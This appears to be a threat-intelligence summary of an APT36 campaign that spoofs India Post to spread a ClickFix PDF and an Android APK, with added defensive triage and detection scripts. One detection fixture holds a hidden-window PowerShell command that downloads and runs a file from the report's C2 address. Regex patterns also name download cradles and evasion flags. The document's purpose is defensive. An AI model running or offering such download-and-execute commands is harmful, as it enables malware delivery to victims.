Full Report
An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as
Analysis Summary
# Threat Actor: APT36
## Attribution & Identity
Attributed with medium confidence to APT36, also known as Transparent Tribe. The threat actor is stated to have ties to Pakistan. The campaign artifacts reference Pakistan's Prime Minister Youth Laptop Scheme (PMYLS).
## Activity Summary
APT36 is conducting a campaign targeting users in India by spoofing the India Post website (`postindia[.]site`). The campaign uses device type (Windows vs. Android) to serve different malicious payloads: a malicious PDF on desktop systems and a malicious APK on mobile devices. The tactic leveraging the PDF dropper is described as a new "ClickFix" technique.
## Tactics, Techniques & Procedures
- **Spearphishing/Impersonation:** Creating a fake website impersonating India Post (`postindia[.]site`).
- **Execution via Social Engineering (Windows):** Delivering a malicious PDF, which instructs the user to execute a PowerShell command via the Run dialog (Win + R).
- **Malicious Document Usage:** Utilizing a PDF that drops and executes a PowerShell command that downloads a next-stage payload.
- **Trojanized Application (Android):** Serving a malicious Android application package (`indiapost.apk`) urging installation for a "better experience."
- **Evasion (Android):** The malicious app changes its icon to mimic a non-suspicious Google Accounts icon to conceal its activity.
- **Persistence (Android):** The app is designed to run continuously in the background, even after a device restart, and actively seeks permissions to ignore battery optimization.
- **Permission Abuse (Android):** Requests extensive permissions to harvest and exfiltrate sensitive data, including contacts, location, and files from external storage.
- **Adversarial Deception:** The malicious app forces users to accept permissions if they are denied initially.
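The Android behaviours listed above (boot persistence, battery-optimization bypass, icon masquerading, broad data-access permissions) are all visible in an APK's manifest before the app is ever run. The following triage script is an added example written for this summary, not code from CYFIRMA or from the `indiapost.apk` sample: it parses a constructed `AndroidManifest.xml` (the package name, class names and icon resources are invented) and maps declared permissions and components to the behaviours the report describes. The `activity-alias` check is a heuristic for icon-swap capability, not a confirmed trait of the real sample.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest for demonstration only. It is NOT the manifest of
# the real indiapost.apk; it simply declares the permission set and components
# that the report's described behaviours would require.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <application android:label="India Post" android:icon="@mipmap/ic_launcher">
    <activity android:name=".MainActivity" android:exported="true"/>
    <activity-alias android:name=".GoogleAlias" android:targetActivity=".MainActivity"
        android:icon="@mipmap/ic_google" android:label="Google" android:enabled="false"/>
    <receiver android:name=".BootReceiver" android:exported="true">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Report-described behaviour -> real Android permissions that enable it.
BEHAVIOUR_PERMISSIONS = {
    "persistence_after_reboot": {"android.permission.RECEIVE_BOOT_COMPLETED"},
    "battery_optimization_bypass": {"android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"},
    "data_harvesting": {
        "android.permission.READ_CONTACTS",
        "android.permission.ACCESS_FINE_LOCATION",
        "android.permission.ACCESS_COARSE_LOCATION",
        "android.permission.READ_EXTERNAL_STORAGE",
    },
}


def triage_manifest(xml_text):
    """Return {behaviour: [evidence, ...]} for the behaviours found in a manifest."""
    root = ET.fromstring(xml_text)
    name_attr = f"{{{ANDROID_NS}}}name"
    icon_attr = f"{{{ANDROID_NS}}}icon"

    # uses-permission elements live in the default namespace; only attributes are prefixed.
    declared = {el.get(name_attr) for el in root.iter("uses-permission")}
    findings = {}
    for behaviour, needed in BEHAVIOUR_PERMISSIONS.items():
        hits = sorted(declared & needed)
        if hits:
            findings[behaviour] = hits

    # A receiver registered for BOOT_COMPLETED is the component that actually restarts the app.
    if any(a.get(name_attr) == "android.intent.action.BOOT_COMPLETED" for a in root.iter("action")):
        findings.setdefault("persistence_after_reboot", []).append("BOOT_COMPLETED receiver")

    # Heuristic: an activity-alias carrying its own icon lets the app switch launcher icons
    # at runtime (enable the alias, disable the original). Flag it for manual review.
    alias_icons = [el.get(icon_attr) for el in root.iter("activity-alias") if el.get(icon_attr)]
    if alias_icons:
        findings["icon_swap_capability"] = alias_icons
    return findings


def risk_score(findings):
    """Crude score: one point per distinct behaviour category observed."""
    return len(findings)


if __name__ == "__main__":
    result = triage_manifest(SAMPLE_MANIFEST)
    for behaviour, evidence in result.items():
        print(f"{behaviour}: {', '.join(evidence)}")
    print("score:", risk_score(result))
```

The script is a first-pass filter: a benign app can legitimately request any one of these permissions, so the value lies in the combination (reboot persistence plus battery-optimization exemption plus contacts, location and storage access plus an alternate-icon alias), which is exactly the profile the report attributes to the APK.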
## Targeting
- **Sectors:** Not explicitly stated, but the use of the India Post spoof suggests targeting the general public or individuals involved in postal/package logistics in India.
- **Geography:** India.
- **Victims:** Windows and Android users visiting the spoofed India Post website. The PDF's EXIF data suggests a possible ideological or intelligence link to Pakistan's Prime Minister Youth Laptop Scheme.
## Tools & Infrastructure
- **Malware Families used:** Malicious PDF dropper leading to PowerShell execution; Malicious Android application (APK).
- **Infrastructure (defanged):**
  - Impersonated domain: `postindia[.]site` (registered November 20, 2024)
  - Next-stage payload C2 (currently inactive): `88.222.245[.]211`
  - Artifact author mentioned: "PMYLS" (likely Pakistan's Prime Minister Youth Laptop Scheme)
## Implications
APT36 (Transparent Tribe) is actively deploying sophisticated, platform-agnostic (Windows and Android) social engineering campaigns aimed at users in India. The adoption of "ClickFix" tactics using PowerShell execution via the Run dialog combined with stealthy Android malware (icon masquerading, persistence features) indicates an evolving and determined threat actor leveraging current events or broad infrastructure (like postal services) for initial access.
## Mitigations
- **User Awareness:** Educate users, especially regarding unsolicited communications related to package delivery or government schemes (like PMYLS), warning against downloading files from lookalike websites.
- **Windows Defense:** Implement application control or monitoring to restrict unauthorized PowerShell execution via user-initiated Run dialog commands.
- **Endpoint Detection (Android):** Deploy mobile threat defense solutions capable of analyzing application behavior, especially regarding permission escalation, icon modification, and battery optimization bypass attempts.
- **Network Monitoring:** Monitor traffic to and from the identified infrastructure (including the currently inactive C2, in case it is reactivated) and add any future indicators to the same watchlist.
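The Windows Defense and Network Monitoring items above translate directly into two detections. The script below is an added example written for this summary, not code from CYFIRMA: it flags process-creation events where PowerShell is launched from `explorer.exe` (the parent for anything typed into the Run dialog) with a download cradle or hidden-window flags, matching the ClickFix pattern described, and it refangs the report's published indicators and matches them against proxy log lines. The event records and log lines are constructed; the field names follow the Sysmon Event ID 1 layout and the `/stage2` path on the C2 IP is an invented placeholder.

```python
import re

# Indicators exactly as published in the report above (defanged).
DEFANGED_IOCS = ["postindia[.]site", "88.222.245[.]211"]


def refang(ioc):
    """Undo the common defanging conventions so indicators can be matched against raw logs."""
    return ioc.replace("[.]", ".").replace("hxxps", "https").replace("hxxp", "http")


# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
# Event 1 models the ClickFix chain: Run dialog -> explorer.exe spawns PowerShell
# that fetches a next stage from the report's C2 IP ("/stage2" is a placeholder path).
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://88.222.245.211/stage2 -OutFile $env:TEMP\u.exe; start $env:TEMP\u.exe"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\Agent\agent.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},  # scheduled admin script, benign
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# Constructed proxy log lines: timestamp, client, method, URL, status.
PROXY_LOGS = [
    "2024-12-01T10:02:11Z 10.0.0.15 GET http://postindia.site/indiapost.apk 200",
    "2024-12-01T10:02:40Z 10.0.0.22 GET http://88.222.245.211/stage2 000",
    "2024-12-01T10:03:05Z 10.0.0.15 GET https://www.example.com/ 200",
]

# Tokens that fetch remote content from a one-liner, and flags that hide or loosen execution.
DOWNLOAD_CRADLE = re.compile(
    r"(\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b|\bwget\b|net\.webclient|start-bitstransfer)",
    re.I,
)
HIDDEN_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-e(xecutionpolicy|p)\s+bypass)",
    re.I,
)


def is_clickfix_like(event):
    """PowerShell spawned by explorer.exe (Run dialog / shell) with a cradle or evasion flag."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    if not parent.endswith("explorer.exe"):
        return False
    cmd = event["CommandLine"]
    return bool(DOWNLOAD_CRADLE.search(cmd) or HIDDEN_FLAGS.search(cmd))


def detect_clickfix(events):
    return [e for e in events if is_clickfix_like(e)]


def match_iocs(log_lines, defanged_iocs):
    """Return (indicator, line) pairs; subdomains of a listed domain also match."""
    iocs = [refang(i) for i in defanged_iocs]
    hits = []
    for line in log_lines:
        for ioc in iocs:
            # No word char or hyphen directly before (so "notpostindia.site" does not match),
            # and no word char, dot or hyphen directly after (so "postindia.site.com" does not).
            if re.search(rf"(?<![\w-]){re.escape(ioc)}(?![\w.-])", line):
                hits.append((ioc, line))
    return hits


if __name__ == "__main__":
    for e in detect_clickfix(PROCESS_EVENTS):
        print("ClickFix-like:", e["CommandLine"])
    for ioc, line in match_iocs(PROXY_LOGS, DEFANGED_IOCS):
        print("IOC hit:", ioc, "<-", line)
```

In production the parent-process condition is what keeps this rule quiet: software-deployment agents and scheduled tasks launch PowerShell constantly, but interactive Run-dialog launches with a download cradle are rare enough to alert on, and the IOC matcher should read the same defanged list the report publishes so indicators are never hand-edited.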